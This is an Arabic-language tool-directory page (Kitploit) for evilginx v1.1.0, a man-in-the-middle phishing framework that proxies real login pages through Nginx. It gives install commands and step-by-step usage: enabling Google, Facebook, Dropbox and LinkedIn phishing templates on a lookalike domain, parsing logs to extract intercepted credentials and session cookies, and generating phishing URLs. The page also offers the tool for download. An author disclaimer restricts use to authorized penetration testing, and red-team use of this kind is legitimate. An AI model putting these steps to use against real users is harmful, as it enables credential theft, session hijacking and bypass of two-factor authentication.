Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
evilginx — يرجى استخدام الإصدار الجديد: https://github.com/kgretzky/evilginx2 | Kitploit
أدوات/GitHubGitHub/kgretzky/evilginx
أدوات التصيداستغلال تطبيقات الويبالتصيد الاحتيالياختبار الاختراقالهندسة الاجتماعيةالمصادقةالفريق الأحمر
GitHubkgretzky/evilginx

evilginx

يرجى استخدام الإصدار الجديد: https://github.com/kgretzky/evilginx2

عرض المستودع
1.2k281منذ 8 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Evilginx v.1.1.0

Evilginx

هذا الإصدار قديم. يُرجى استخدام أحدث إصدار!

EVILGINX 2: https://github.com/kgretzky/evilginx2

إيفيلجينكس هو إطار عمل هجوم وسيط (man-in-the-middle) يُستخدم لاصطياد بيانات الاعتماد وملفات تعريف الارتباط للجلسات لأي خدمة ويب. يعمل جوهره على خادم Nginx HTTP، الذي يستخدم proxy_pass وsub_filter لتوكيل وتعديل محتوى HTTP، مع اعتراض حركة المرور بين العميل والخادم.

يمكنك معرفة كيفية عمله وكيفية تثبيت كل شيء بنفسك على مدونتي:

المقال الأول قديم بعض الشيء الآن: إيفيلجينكس - التصيد المتقدم مع تجاوز المصادقة الثنائية

تحديث Evilginx 1.0: تحديث Evilginx 1.0 - ارفع مستوى لعبتك في التصيد عبر المصادقة الثنائية

تحديث Evilginx 1.1: تحديث Evilginx 1.1

إخلاء مسؤولية

أنا مدرك أن Evilginx يمكن استخدامه لأغراض شريرة جدًا. هذا العمل هو مجرد عرض لما يمكن للمهاجمين المهرة فعله. من مسؤولية المدافع أن يأخذ مثل هذه الهجمات في الاعتبار، عند إعداد الدفاعات، وإيجاد طرق للحماية من طريقة التصيد هذه. يجب استخدام Evilginx فقط في مهام اختبار الاختراق المشروعة بإذن كتابي من الأطراف المستهدفة بالتصيد.

قاعة مشاهير المساهمين

@poweroftrue

التثبيت

يوفر Evilginx سكريبت تثبيت باسم install.sh يتولى تثبيت الحزمة بأكملها على أي جهاز يعمل بدبيان إصدار wheezy/jessie، بطريقة تشغيل ونسيان.

root@kitploit:~
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh

الاستخدام

root@kitploit:~
            _ _       _           
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/          v1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit
الإعداد

تمكين أو تعطيل تكوينات المواقع لاستخدامها مع خادم Nginx، باستخدام قوالب Evilginx المقدمة من مجلد sites.

root@kitploit:~
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Your phishing domain.
  -y                    Answer all questions with 'Yes'.
  -l, --list            List available supported apps.
  --enable ENABLE       Enable following site by name.
  --disable DISABLE     Disable following site by name.

سرد قوالب تكوين المواقع المتاحة:

root@kitploit:~
python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

تمكين موقع التصيد الخاص بجوجل باستخدام نطاق تصيد مسجل مسبقًا not-really-google.com:

root@kitploit:~
python evilginx.py setup --enable google -d not-really-google.com

تعطيل موقع التصيد الخاص بفيسبوك:

root@kitploit:~
python evilginx.py setup --disable facebook
التحليل

تحليل سجلات Nginx لاستخراج بيانات اعتماد تسجيل الدخول وملفات تعريف الارتباط للجلسات المعترضة. بشكل افتراضي، تُحفظ السجلات في مجلد logs، حيث يوجد سكريبت evilginx.py. يمكن القيام بذلك تلقائيًا بعد تمكين التحليل التلقائي في مرحلة الإعداد.

root@kitploit:~
usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs
                        for all sites).
  --debug               Does not truncate log file after parsing.

تحليل السجلات لموقع جوجل فقط:

root@kitploit:~
python evilginx.py parse -s google

تحليل السجلات لجميع المواقع المتاحة:

root@kitploit:~
python evilginx.py parse -s all
إنشاء عنوان URL

إنشاء عناوين URL للتصيد يمكنك استخدامها في تقييمات فريقك الأحمر.

root@kitploit:~
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to generate link for.
  -r REDIRECT, --redirect REDIRECT
                        Redirect user to this URL after successful sign-in.

إنشاء عنوان URL لتصيد جوجل يعيد توجيه الضحية إلى فيديو rick'roll عند تسجيل الدخول بنجاح:

root@kitploit:~
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
تنزيل الأداة